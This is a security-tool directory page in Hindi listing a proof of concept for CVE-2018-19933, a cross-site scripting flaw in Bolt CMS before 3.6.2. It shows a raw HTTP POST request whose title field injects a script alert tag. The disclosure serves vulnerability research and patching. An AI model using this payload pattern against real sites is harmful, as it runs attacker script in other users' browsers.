Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Bolt-CMS-3.6.2---Cross-Site-Scripting — Bolt CMS <3.6.2 - Cross-Site Scripting Vulnerability | Kitploit
उपकरण/GitHubGitHub/rdincel1/bolt-cms-3.6.2---cross-site-scripting
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubrdincel1/bolt-cms-3.6.2---cross-site-scripting

Bolt-CMS-3.6.2---Cross-Site-Scripting

Bolt CMS <3.6.2 - Cross-Site Scripting Vulnerability

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
7 साल पहलेअभी तक समीक्षित नहीं

Bolt CMS <3.6.2 - क्रॉस-साइट स्क्रिप्टिंग भेद्यता

Bolt CMS <3.6.2 - क्रॉस-साइट स्क्रिप्टिंग भेद्यता

CVE-2018-19933

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19933

प्रूफ ऑफ कॉन्सेप्ट

भेद्यता का शोषण करने के लिए, Bolt CMS <3.6.2 में टेक्स्ट इनपुट और प्रीव्यू बटन पर क्लिक के माध्यम से XSS संभव है, जैसा कि Configured और New Entry के Title फ़ील्ड द्वारा प्रदर्शित किया गया है।

root@kitploit:~
POST /preview/page HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/bolt/editcontent/pages
Content-Type: application/x-www-form-urlencoded
Content-Length: 396
Connection: close
Cookie: bolt_session_cf7976ea5999f8e272ce7cd50c84d240=14b61865131cf9422af970ae28a097b7; bolt_authtoken_cf7976ea5999f8e272ce7cd50c84d240=0b69633d5a549f19bf3faa88462b7b8e17ba57ba9dff6d25a708efe6dd6a9a04
Upgrade-Insecure-Requests: 1

content_edit%5B_token%5D=jMmm41dJQXpXx3gwE_VQkA60fdsNo6DERJClPVkYh7U&editreferrer=&contenttype=pages&title=%3Cscript%3Ealert%28%22Raif%22%29%3C%2Fscript%3E&slug=script-alert-raif-script&image%5Bfile%5D=&files%5B%5D=&teaser=&body=&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2018-12-07+00%3A12%3A05&datedepublish=&ownerid=1&_live-editor-preview=

प्रूफ ऑफ कॉन्सेप्ट (वीडियो)

PoC_Video

स्क्रीनशॉट

PoC_1 अनुरोध

टूल डाउनलोड करें